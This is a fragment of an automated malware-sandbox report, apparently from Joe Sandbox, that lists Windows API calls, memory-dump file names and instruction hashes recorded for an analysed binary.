                                                                                                    • PostMessageW.USER32(00000000), ref: 00B32373
                                                                                                      • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                                                                                                    • Instruction ID: 35ea3d2dc20da3d2ae143acfca3cc77d5f9c1fc5195e6362cfe33caa0b04ef20
                                                                                                    • Opcode Fuzzy Hash: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                                                                                                    • Instruction Fuzzy Hash: 2BD0C9323813107AE664A7B09C0FFCA7A54AB15B10F5149567655BB1E0C9B4A8018B54
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00ADBE93
                                                                                                    • GetLastError.KERNEL32 ref: 00ADBEA1
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADBEFC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                                                                                                    • Instruction ID: 74ada38d48943c55b244f7ecbd0d1c7d5c07e81a884ff70a84d94336dd8cffe5
                                                                                                    • Opcode Fuzzy Hash: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                                                                                                    • Instruction Fuzzy Hash: 5C41C435610246EFCB21CFA5CD44BAA7BA5AF45310F26416AF95A9B3A1DB30DD00DB70